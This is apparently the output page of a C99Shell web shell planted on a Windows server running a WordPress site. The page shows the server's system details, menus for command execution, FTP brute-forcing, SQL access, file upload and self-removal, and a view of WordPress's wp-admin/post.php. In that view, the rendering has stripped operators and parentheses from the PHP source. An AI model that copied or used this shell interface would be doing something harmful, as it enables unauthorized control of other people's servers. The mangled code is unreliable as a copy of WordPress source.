!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\bogotacumbredelclima\wp-admin\   drwxrwxrwx
Free 1.22 GB of 239.26 GB (0.51%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     post.php (8.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Edit post administration panel.
 *
 * Manage Post actions: post, edit, delete, etc.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** WordPress Administration Bootstrap */
require_once( dirname__FILE__ ) . '/admin.php' );

$parent_file 'edit.php';
$submenu_file 'edit.php';

wp_reset_vars( array( 'action' ) );

if ( isset( 
$_GET['post'] ) )
     
$post_id $post_ID = (int) $_GET['post'];
elseif ( isset( 
$_POST['post_ID'] ) )
     
$post_id $post_ID = (int) $_POST['post_ID'];
else
     
$post_id $post_ID 0;

global 
$post_type$post_type_object$post;

if ( 
$post_id )
    
$post get_post$post_id );

if ( 
$post ) {
    
$post_type $post->post_type;
    
$post_type_object get_post_type_object$post_type );
}

/**
 * Redirect to previous page.
 *
 * @param int $post_id Optional. Post ID.
 */
function redirect_post($post_id '') {
    if ( isset(
$_POST['save']) || isset($_POST['publish']) ) {
        
$status get_post_status$post_id );

        if ( isset( 
$_POST['publish'] ) ) {
            switch ( 
$status ) {
                case 
'pending':
                    
$message 8;
                    break;
                case 
'future':
                    
$message 9;
                    break;
                default:
                    
$message 6;
            }
        } else {
                
$message 'draft' == $status 10 1;
        }

        
$location add_query_arg'message'$messageget_edit_post_link$post_id'url' ) );
    } elseif ( isset(
$_POST['addmeta']) && $_POST['addmeta'] ) {
        
$location add_query_arg'message'2wp_get_referer() );
        
$location explode('#'$location);
        
$location $location[0] . '#postcustom';
    } elseif ( isset(
$_POST['deletemeta']) && $_POST['deletemeta'] ) {
        
$location add_query_arg'message'3wp_get_referer() );
        
$location explode('#'$location);
        
$location $location[0] . '#postcustom';
    } else {
        
$location add_query_arg'message'4get_edit_post_link$post_id'url' ) );
    }

    
/**
     * Filter the post redirect destination URL.
     *
     * @since 2.9.0
     *
     * @param string $location The destination URL.
     * @param int    $post_id  The post ID.
     */
    
wp_redirectapply_filters'redirect_post_location'$location$post_id ) );
    exit;
}

if ( isset( 
$_POST['deletepost'] ) )
    
$action 'delete';
elseif ( isset(
$_POST['wp-preview']) && 'dopreview' == $_POST['wp-preview'] )
    
$action 'preview';

$sendback wp_get_referer();
if ( ! 
$sendback ||
     
strpos$sendback'post.php' ) !== false ||
     
strpos$sendback'post-new.php' ) !== false ) {
    if ( 
'attachment' == $post_type ) {
        
$sendback admin_url'upload.php' );
    } else {
        
$sendback admin_url'edit.php' );
        if ( ! empty( 
$post_type ) ) {
            
$sendback add_query_arg'post_type'$post_type$sendback );
        }
    }
} else {
    
$sendback remove_query_arg( array('trashed''untrashed''deleted''ids'), $sendback );
}

switch(
$action) {
case 
'post-quickdraft-save':
    
// Check nonce and capabilities
    
$nonce $_REQUEST['_wpnonce'];
    
$error_msg false;

    
// For output of the quickdraft dashboard widget
    
require_once ABSPATH 'wp-admin/includes/dashboard.php';

    if ( ! 
wp_verify_nonce$nonce'add-post' ) )
        
$error_msg __'Unable to submit this form, please refresh and try again.' );

    if ( ! 
current_user_can'edit_posts' ) )
        
$error_msg __'Oops, you don&#8217;t have access to add new drafts.' );

    if ( 
$error_msg )
        return 
wp_dashboard_quick_press$error_msg );

    
$post get_post$_REQUEST['post_ID'] );
    
check_admin_referer'add-' $post->post_type );

    
$_POST['comment_status'] = get_option'default_comment_status' );
    
$_POST['ping_status'] = get_option'default_ping_status' );

    
edit_post();
    
wp_dashboard_quick_press();
    exit;

case 
'postajaxpost':
case 
'post':
    
check_admin_referer'add-' $post_type );
    
$post_id 'postajaxpost' == $action edit_post() : write_post();
    
redirect_post$post_id );
    exit();

case 
'edit':
    
$editing true;

    if ( empty( 
$post_id ) ) {
        
wp_redirectadmin_url('post.php') );
        exit();
    }

    if ( ! 
$post )
        
wp_die__'You attempted to edit an item that doesn&#8217;t exist. Perhaps it was deleted?' ) );

    if ( ! 
$post_type_object )
        
wp_die__'Unknown post type.' ) );

    if ( ! 
current_user_can'edit_post'$post_id ) )
        
wp_die__'You are not allowed to edit this item.' ) );

    if ( 
'trash' == $post->post_status )
        
wp_die__'You can&#8217;t edit this item because it is in the Trash. Please restore it and try again.' ) );

    if ( ! empty( 
$_GET['get-post-lock'] ) ) {
        
wp_set_post_lock$post_id );
        
wp_redirectget_edit_post_link$post_id'url' ) );
        exit();
    }

    
$post_type $post->post_type;
    if ( 
'post' == $post_type ) {
        
$parent_file "edit.php";
        
$submenu_file "edit.php";
        
$post_new_file "post-new.php";
    } elseif ( 
'attachment' == $post_type ) {
        
$parent_file 'upload.php';
        
$submenu_file 'upload.php';
        
$post_new_file 'media-new.php';
    } else {
        if ( isset( 
$post_type_object ) && $post_type_object->show_in_menu && $post_type_object->show_in_menu !== true )
            
$parent_file $post_type_object->show_in_menu;
        else
            
$parent_file "edit.php?post_type=$post_type";
        
$submenu_file "edit.php?post_type=$post_type";
        
$post_new_file "post-new.php?post_type=$post_type";
    }

    if ( ! 
wp_check_post_lock$post->ID ) ) {
        
$active_post_lock wp_set_post_lock$post->ID );

        if ( 
'attachment' !== $post_type )
            
wp_enqueue_script('autosave');
    }

    if ( 
is_multisite() ) {
        
add_action'admin_footer''_admin_notice_post_locked' );
    } else {
        
$check_users get_users( array( 'fields' => 'ID''number' => ) );

        if ( 
count$check_users ) > )
            
add_action'admin_footer''_admin_notice_post_locked' );

        unset( 
$check_users );
    }

    
$title $post_type_object->labels->edit_item;
    
$post get_post($post_idOBJECT'edit');

    if ( 
post_type_supports($post_type'comments') ) {
        
wp_enqueue_script('admin-comments');
        
enqueue_comment_hotkeys_js();
    }

    include( 
ABSPATH 'wp-admin/edit-form-advanced.php' );

    break;

case 
'editattachment':
    
check_admin_referer('update-post_' $post_id);

    
// Don't let these be changed
    
unset($_POST['guid']);
    
$_POST['post_type'] = 'attachment';

    
// Update the thumbnail filename
    
$newmeta wp_get_attachment_metadata$post_idtrue );
    
$newmeta['thumb'] = $_POST['thumb'];

    
wp_update_attachment_metadata$post_id$newmeta );

case 
'editpost':
    
check_admin_referer('update-post_' $post_id);

    
$post_id edit_post();

    
// Session cookie flag that the post was saved
    
if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id '-check' ) {
        
setcookie'wp-saving-post'$post_id '-saved'time() + DAY_IN_SECONDS );
    }

    
redirect_post($post_id); // Send user on their way while we keep working

    
exit();

case 
'trash':
    
check_admin_referer('trash-post_' $post_id);

    if ( ! 
$post )
        
wp_die__'The item you are trying to move to the Trash no longer exists.' ) );

    if ( ! 
$post_type_object )
        
wp_die__'Unknown post type.' ) );

    if ( ! 
current_user_can'delete_post'$post_id ) )
        
wp_die__'You are not allowed to move this item to the Trash.' ) );

    if ( 
$user_id wp_check_post_lock$post_id ) ) {
        
$user get_userdata$user_id );
        
wp_diesprintf__'You cannot move this item to the Trash. %s is currently editing.' ), $user->display_name ) );
    }

    if ( ! 
wp_trash_post$post_id ) )
        
wp_die__'Error in moving to Trash.' ) );

    
wp_redirectadd_query_arg( array('trashed' => 1'ids' => $post_id), $sendback ) );
    exit();

case 
'untrash':
    
check_admin_referer('untrash-post_' $post_id);

    if ( ! 
$post )
        
wp_die__'The item you are trying to restore from the Trash no longer exists.' ) );

    if ( ! 
$post_type_object )
        
wp_die__'Unknown post type.' ) );

    if ( ! 
current_user_can'delete_post'$post_id ) )
        
wp_die__'You are not allowed to move this item out of the Trash.' ) );

    if ( ! 
wp_untrash_post$post_id ) )
        
wp_die__'Error in restoring from Trash.' ) );

    
wp_redirectadd_query_arg('untrashed'1$sendback) );
    exit();

case 
'delete':
    
check_admin_referer('delete-post_' $post_id);

    if ( ! 
$post )
        
wp_die__'This item has already been deleted.' ) );

    if ( ! 
$post_type_object )
        
wp_die__'Unknown post type.' ) );

    if ( ! 
current_user_can'delete_post'$post_id ) )
        
wp_die__'You are not allowed to delete this item.' ) );

    
$force = ! EMPTY_TRASH_DAYS;
    if ( 
$post->post_type == 'attachment' ) {
        
$force = ( $force || ! MEDIA_TRASH );
        if ( ! 
wp_delete_attachment$post_id$force ) )
            
wp_die__'Error in deleting.' ) );
    } else {
        if ( ! 
wp_delete_post$post_id$force ) )
            
wp_die__'Error in deleting.' ) );
    }

    
wp_redirectadd_query_arg('deleted'1$sendback) );
    exit();

case 
'preview':
    
check_admin_referer'update-post_' $post_id );

    
$url post_preview();

    
wp_redirect($url);
    exit();

default:
    
wp_redirectadmin_url('edit.php') );
    exit();
// end switch
include( ABSPATH 'wp-admin/admin-footer.php' );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--